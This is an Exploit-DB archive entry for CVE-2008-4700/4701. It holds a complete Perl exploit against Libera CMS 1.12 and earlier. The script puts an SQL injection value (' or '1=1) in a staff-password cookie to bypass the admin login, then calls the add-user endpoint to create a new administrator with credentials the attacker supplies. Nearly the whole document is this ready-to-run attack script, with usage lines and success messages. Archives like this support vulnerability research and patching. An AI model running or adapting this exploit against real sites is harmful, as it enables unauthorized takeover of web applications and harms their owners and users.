Libera CMS <= 1.12 Cookie Remote SQL Injection Exploit

2008-09-10T00:00:00
ID EDB-ID:6416
Type exploitdb
Reporter StAkeR
Modified 2008-09-10T00:00:00

Description

Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit. CVE-2008-4700,CVE-2008-4701. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
 # ----------------------------------------------------------
 # Libera CMS &lt;= 1.12 (Cookie) Remote SQL Injection Exploit
 # Perl Exploit - Add a new admin with your credentials!
 # Author: StAkeR - StAkeR[at]hotmail[dot]it
 # ----------------------------------------------------------
 # Usage: perl http://localhost/cms StAkeR obscure
 # ----------------------------------------------------------

 use strict;
 use LWP::UserAgent;

 my ($hostname,$username,$password) = @ARGV;
 my $request  = undef;
 my $http_s   = new LWP::UserAgent or die $!;

 $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
 banner() unless $username and $password;

 $http_s-&gt;agent("Mozilla/4.5 [en] (Win95; U)");
 $http_s-&gt;timeout(1);
 $http_s-&gt;default_header('Cookie' =&gt; "libera_staff_pass=' or '1=1");           

 $request = $http_s-&gt;post($hostname."/admin.php?action=add_user_process",
                         [
                          username       =&gt; $username,
                          password       =&gt; $password,
                          password_again =&gt; $password,
                          email          =&gt; 0,
                          su             =&gt; 1,
                          submit         =&gt; "Add+User"
                        ]);
        
 if($request-&gt;is_success)
 {
   if($request-&gt;content =~ /added successfully/i)
   {
     print "[+] Exploit Done!\n";
     print "[+] Added New Administrator:\n\n";
     print "[+] Username: ${username}\n";
     print "[+] Password: ${password}\n";
   }
   else
   {
     print "[!] Exploit Failed!\n";
     print "[!] Site Not Vulnerable\n";
   }
 }


 sub banner
 {
   print "[+] Libera CMS &lt;= 1.2 Remote SQL Injection Exploit (add new admin)\n";
   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
   return exit;
 }

# milw0rm.com [2008-09-10]